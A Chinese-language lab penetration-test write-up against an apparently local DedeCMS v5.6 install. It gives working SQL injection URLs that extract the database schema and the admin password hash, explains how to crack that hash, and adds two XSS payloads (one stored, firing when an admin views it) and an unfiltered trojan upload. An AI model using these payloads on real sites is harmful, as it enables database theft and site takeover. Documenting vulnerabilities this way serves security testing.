0x00 SQL注入漏洞
SQL注入漏洞1
注入點:http://192.168.1.130/member/buy_action.php?product=
完整payload:
http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select database()),(select 1),'4
訪問http://192.168.1.130/member/operation.php 查詢出信息
當前數據庫信息dedecmsv56gbk
http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select table_name from information_schema.tables where table_schema=database() LIMIT 7,1),(select 1),'4
查出表名 dede_admin
http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select column_name from information_schema.columns where table_name=0x646564655f61646d696e LIMIT 6,1),(select 1),'4

圖片1 sql注入漏洞1
SQL注入漏洞2
注入點:http://192.168.1.130/member/mystow.php?type=book'
Payload:http://192.168.1.130/member/mystow.php?type=book' union select 1,2,3,database(),5,6,7,8,9%23

圖片2 sql注入漏洞2
####SQL注入漏洞3 參考鏈接http://wooyun.tangscan.cn/static/bugs/wooyun-2014-063441.html 注冊用戶在筆名中添加如下字符 ``` ',char(@`'`),0,0,database(),0,0)# ``` 然后添加一個好友 觸發數據庫查詢,再回到我的織夢中即可看到查詢出的數據 
圖片3 sql注入漏洞3
####SQL注入漏洞4 參考鏈接:http://wooyun.tangscan.cn/static/bugs/wooyun-2014-052214.html 注入點: `http://192.168.1.130/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=` 漏洞利用payload ``` http://192.168.1.130/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 ``` 
圖片4 sql注入漏洞4
如果是32位MD5減去頭5位,減去尾七位 如果是20位MD5密碼,前減3后減1,得到16位MD5 將得到的23a7bbd73250516f069d處理后得到7bbd73250516f069,放到cmd5解密得到admin的密碼為admin123
0x01 Xss漏洞
Xss漏洞1:
完整payload:
http://192.168.1.130/plus/recommend.php?aid=1&action=sendmail&title=%3Cscript%3Ealert%281%29%3C/script%3E
漏洞證明:

圖片5 xss漏洞1
####XSS漏洞2 參考鏈接: http://wooyun.tangscan.cn/static/bugs/wooyun-2014-065561.html 普通用戶申請友情鏈接,在網站logo處添加 ``` '" onerror=alert(1);// ``` 
圖片6 xss漏洞2填寫信息
觸發條件:后台管理員登陸查看友情鏈接申請觸發xss 漏洞證明: 
圖片7 xss漏洞2觸發證明
0x02文件上傳漏洞
1,在后台頁面文件式管理處,點擊上傳文件,直接上傳木馬,沒有過濾。

圖片8 文件上傳漏洞點